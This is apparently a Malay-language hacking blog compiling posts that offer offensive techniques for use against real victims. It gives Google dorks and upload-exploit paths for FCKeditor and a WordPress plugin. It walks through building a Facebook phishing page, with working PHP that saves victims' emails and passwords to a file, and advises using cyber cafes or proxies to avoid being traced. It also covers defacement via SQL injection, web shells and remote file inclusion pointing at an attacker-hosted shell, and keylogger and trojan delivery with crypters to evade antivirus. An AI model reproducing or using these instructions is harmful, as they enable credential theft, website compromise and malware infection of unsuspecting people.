Cara Menukar Extension File

Ramai yang bertanya bagaimanakah menukar extension file seperti contoh file deface yang saya gunakan dalam FCK Link Gallery - File Uploader.

Baik di sini saya akan tunjukkan caranya "step by step".

FCK Link Gallery - File Uploader

Dork : inurl:fck/fcklinkgallery

Exploit 1 : providers/htmleditorproviders/fck/fcklinkgallery.aspx

Exploit 2 : javascript:__doPostBack('ctlURL$cmdUpload','')

Wordpress Exploit Easy Comment Upload

Title : Wordpress Exploit Easy Comment Upload

Dork : inurl:easy-comment-uploads/upload-form.php

POC :  /wp-content/plugins/easy-comment-uploads/upload-form.php

Fckeditor Uploader Defacement

Ini adalah satu POC lama menggunakan FCKEDITOR... Laman web yang akan digunakan adalah seperti di bawah kerana bukan semua laman web boleh menggunakan POC ini...

Cara Hack Facebook - Phising

Atas permintaan sahabat, saya terangkan di sini cara untuk membuat phising. Cara ini hanyalah untuk rujukan pelajaran sahaja. Sebarang penyalahgunaan adalah tanggungjawab anda sendiri.


1. Buka laman utama Facebook, kemudian klik kiri dan pilih "save page as" dan save dengan nama fake.html.

Rujuk gambar di bawah untuk keterangan lanjut :

2. Sesudah itu buat satu .php file. Buka notepad anda dan salin ayat di bawah ini.

<html> <body> <?php $handle = fopen("password.txt", "a"); fwrite($handle,$_POST["email"]); fwrite($handle,"\n"); fwrite($handle,$_POST["pass"]); fwrite($handle,"\n"); fwrite($handle,"\n"); fclose($handle); header("Location: https://www.facebook.com/login.php?login_attempt=1"); exit; ?> </body></html>

Kemudian save sebagai index.php

3. Buka fake.html anda tadi menggunakan notepad. ( Right-Click dan pilih "open with" pilih "notepad" )

4. Tekan butang CTRL+F dan cari perkataan "action". kemudian tukar perkataan https:www.facebook.com/login.php?login_attempt=1 kepada index.php.

5. Sesudah itu save fake.html anda tadi.

6. Buka notepad anda dan jangan tulis apa-apa cuma save sahaja sebagai password.txt

7. Gambar di bawah ini adalah 3 contoh file yang anda perlukan.

8. Sesudah itu upload semua file ini ke http://www.000webhost.com/ atau kemana saja laman web yang menyediakan php file hosting.



Peringatan : Saya cadangkan anda melakukan proses upload dan proses menyebarkan link phising ne melalui cyber cafe untuk mengelakkan anda dikesan.

Kecuali anda telah menggunakan Auto Hide IP / Proxy.

Elakkan diri anda daripada dikesan.

Cara Hack Laman Web (Deface)

Ini adalah beberapa cara untuk melumpuhkan laman web yang biasa digunakan oleh hacker.

1. SQL Injection - SQLi
2. XSS - Cross Site Scripting
3. Shells
4. RFI - Remote File Inclusion
5. Dan banyak lagi.

1. SQL Injection

Pada masa ini kebanyakkan laman web seperti forum dan laman web persendirian disambungkan kepada SQL Database. Ini membantu mereka untuk menyimpan ID dan PASSWORD [ENCRYPTED] apabila pelawat mendaftar di laman web mereka.

SQL Database akan berfungsi setiap kali pelawat LOG IN ke dalam laman web mereka.

Semasa proses LOG IN, maklumat ID dan PASSWORD pengguna akan dihantar ke SQL Datebase, sekiranya maklumat yang diberikan betul maka pengguna akan LOG IN ke dalam laman web tersebut, sekiranya maklumat yang diberikan salah maka pengguna akan mendapat ERROR yang menyatakan bahawa ID dan PASSWORD pengguna adalah salah.

Sebenarnya apa yang dilakukan oleh HACKER adalah cuba untuk mengeksplotasi dan memecah masuk ke dalam pangkalan data laman web tersebut untuk mencuri maklumat laman web tersebut.

HACKING jenis adalah paling rumit untuk dilakukan.

Jika anda ingin memeriksa laman web anda terdedah kepada SQLi ataupun tidak maka anda perlu membuat perkara seperti di bawah.

Contoh laman web anda :

lamanwebanda.com/index.php?id=545

Cuma perlu tambah ' pada hujung nombor tersebut.

lamanwebanda.com/index.php?id=545'

Jika ERROR keluar maka laman web anda terdedah kepada SQLi.

Contoh Error :

"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1"

....Dan banyak lagi

-------------------------------------------------------------------------------------------------

2. XSS - Cross Site Scripting

Biasanya kebanyakkan laman web / forum akan menyediakan kotak komen yang menyokong HTML. Ini akan memberi HACKER peluang untuk meletakkan skrip yang berniat jahat di dalam artikel tersebut. Jadi apabila pengguna lain mengklik link tersebut, secara automatik cookies / sejarah internet pengguna akan dihantar kepada HACKER yang meletakkan link tersebut. Jadi HACKER akan memanipulasi cookies tersebut untuk LOG IN ke dalam laman web dan meneruskan kerja untuk deface laman web tersebut.

-------------------------------------------------------------------------------------------------

3. Shells

Ini adalah script .php yang berbahaya. Apa yang anda perlu lakukan, cari laman web yang anda boleh upload apa sahaja file contohnya :- avatars, gambar atau lain-lain. Anda upload file shells anda keatas laman web tersebut dan jika anda berjaya maka apabila anda membuka laman web tersebut, anda akan nampak seluruh akaun "FTP - File Transfer Protocol" di dalam laman web tersebut. Anda boleh mengubah/mengedit/mengupload atau mendownload apa sahaja dari laman web tersebut termasuk laman index. Ini juga dinamakan sebagai DEFACE.

-------------------------------------------------------------------------------------------------

4. RFI - Remote File Inclusion

Ini adalah cara terbaik untuk membuat deface ke atas sesuatu laman web. Ia menggunakan shells. Anda harus mengupload shell anda di laman web anda sendiri.

KOD :

lamanwebanda.com/shells.txt

jika anda menemui laman web yang terdedah kepada RFI, anda harus melakukan seperti di bawah :

lamanwebmangsa.com/index.php?page=lamanwebanda.com/shells.txt

Ini akan memberi anda akses ke atas akaun FTP laman web mangsa. Jadi anda boleh melakukan apa sahaja termasuk mendeface laman web mangsa.

Jika anda ingin memeriksa laman web anda terdedah kepada ancaman RFI ataupun tidak maka anda harus melakukan seperti di bawah ini.

Contoh laman web anda :

lamanwebanda.com/index.php?id=545

buat seperti di bawah ini :

lamanwebanda.com/index.php?id=http;//www.google.com

Sekiranya laman web google dipamerkan dalam laman web anda maka laman web anda terdedah kepada ancaman RFI.

Cara Untuk Hacking

Berikut adalah 4 jenis cara HACKING yang biasa digunakan oleh CRACKER untuk menceroboh masuk ke dalam email, password dan mencuri maklumat credit card.

1. Phising

2. Brute Forcing

3. Keylogging

4. Trojan

1. Phising

Cara ini digunakan untuk mendapatkan USER ID dan PASSWORD mangsa dengan menggunakan LAMAN WEB yang DIPALSUKAN. CRACKER akan membuat satu LAMAN WEB palsu seperti FB dan lain-lain. Kemudian laman web palsu ini akan digunakan untuk memperdayakan MANGSA untuk memasukkan ID dan PASSWORD mereka melalui LAMAN WEB PALSU yang dibina oleh CRACKER ini. MANGSA yang kurang berwaspada akan memasukkan PASSWORD dan ID mereka, secara automatik CRACKER akan memperolehi akses 100% ke atas akaun mereka.

Kebiasaanya CRACKER akan mengirim link kepada MANGSA dengan contoh kononnya "FB MANGSA mengalami masalah, sekiranya MANGSA tidak membuat update ke atas akaun FB mereka maka akaun mereka akan dipadam" CRACKER akan menyertakan link dan menyuruh mangsa menggunakan link tersebut untuk membuat LOG IN ke dalam akaun mereka. Maka dengan cara ini CRACKER telah berjaya memperdaya MANGSA untuk memberi ID dan PASSWORD mereka tanpa disedari oleh MANGSA.

Keburukan :

Kebanyakkan website akan mengesan link yang dibuat oleh CRACKER dan memberitahu MANGSA bahawa link tersebut adalah PALSU. MANGSA yang mempunyai pengetahuan sedikit dalam bidang komputer akan menyedari bahawa link yang tersebut adalah PALSU.

Teknik ini kebanyakkannya digunakan oleh SCRIPT KIDDIES HACKER - Mereka yang masih baru dan tidak mengetahui apa-apa mengenai HACKING SKILL.

----------------------------------------------------------------------------------------------------

2. Brute Forcing

CRACKER akan menggunakan cara ini untuk membuat percubaan memecah masuk kedalam akaun MANGSA dengan memecahkan ID dan PASSWORD mangsa. CRACKER akan menggunakan semua perkataan yang ada di dalam HACKER DICTIONARY untuk mencuba mencari padanan yang sesuai untuk ID dan PASSWORD mangsa. Dalam kata lain CRACKER akan cuba meneka ID dan PASSWORD MANGSA berdasarkan HACKER DICTIONARY. Perkara ini akan dilakukan oleh CRACKER dengan menggunakan satu perisian BRUTE FORCING ATTACK.

Keburukan :

1. Cara ini memerlukan tempoh masa yang lama.

2. Cara ini tidak dijamin untuk berjaya.

3. Kebanyakkan pengguna internet masa kini menggunakan password dengan kombinasi "NOMBOR-HURUF-SIMBOL" yang agak susah untuk dipecahkan.

4. Kebanyakkan laman web menyediakan fungsi "IMAGE CAPTCHA" sekiranya PENGGUNA GAGAL untuk memberi PASSWORD dan ID yang betul sebanyak 2 hingga ke 5 kali.

-----------------------------------------------------------------------------------------------------

3. Keylogging

Anda harus menyediakan satu SERVER dan kemudian menghantar SERVER ini kepada MANGSA. Apabila sahaja MANGSA mengclick link yang diberi makan kerja anda selesai. Inilah cara terbaik dalam HACKING. Setelah MANGSA mengclick link yang anda beri maka secara AUTOMATIK keylogging akan tertanam ke dalam komputer mereka. Maka keylogging akan menjalankan tugasnya dengan merekod setiap kali keyboard ditekan dan semua maklumat akan dikirim kepada ANDA melalui EMAIL atau FTP - berdasarkan cara yang ANDA guna.

Keburukan :

1. Pada masa kini kebanyakkan keylogging akan di kesan sebagai virus oleh antivirus MANGSA dan fail ANDA akan dipadam secara AUTOMATIK. Anda harus mencari jalan untuk mematikan antivirus MANGSA bagi memastikan fail ANDA dapat ditanam ke dalam komputer MANGSA.

2. Kebanyakkan FIREWALL juga akan mengesan dan menyekat FAIL KEYLOGGING anda secara AUTOMATIK dan menghalang FAIL ini didownload oleh MANGSA.

Tips :


Anda harus menggunakan satu cara dengan menggunakan perisian yang dipanggil "CRYPTERS". Perisian ini akan memasang pelindung KHAS kepada FAIL KEYLONGGING ANDA dan menyebabkan ANTI-VIRUS atau FIREWALL MANGSA tidak dapat mengesan FAIL anda sebagai virus. Maka FAIL ANDA akan ditanam secara selamat ke dalam komputer MANGSA.

-----------------------------------------------------------------------------------------------------

4. TROJANS.

Trojan juga dikenali sebagai "BAPA KEPADA KEYLOGGING". Namun TROJAN mampu menjalankan kerja lebih baik dengan mengmbil alih komputer MANGSA. Anda mampu memadam/mengedit/mengupload/mendownload maklumat yang ANDA inginkan dari komputer MANGSA. Kata lain anda boleh memusnahkan 100% komputer mangsa.Contoh untuk menggunakan TROJAN adalah dengan menggunakan perisian RAT.

Keburukan :

SAMA SEPERTI KEYLOGGING

Tips :


SAMA SEPERTI KEYLOGGING

-----------------------------------------------------------------------------------------------------

Sekiranya anda ingin mendalami ilmu di atas anda hendaklah mempelajarinya. Adat seorang HACKER "Anda harus belajar dan yakin terhadap diri sendiri tanpa perlu bergantung kepada orang lain". Inilah HACKER SEJATI.

Google Chrome Sebagai Mesin Hacking - KromCAT

Wah entry Muz semalam sentap ke? Sorilah sahabatku semua... Muz tak berniat nak kutuk sesiapa... Muz cuma nak bersuara bagi pihak yang sependapat dengan Muz bagi masalah macam tu... Malam ne Muz tak buat artikel sentap lagi, nanti kena benci plak kan..

Malam ne Muz nak bawa korang convert Google Chrome menjadi salah satu mesin hacking... Bagi seorang Hacker adalah menjadi kewajipan untuk memastikan jejak mereka tidak dikesan kerana itu boleh mendatangkan bencana... Ini adalah hal penting bagi seorang BLACK HAT HACKER...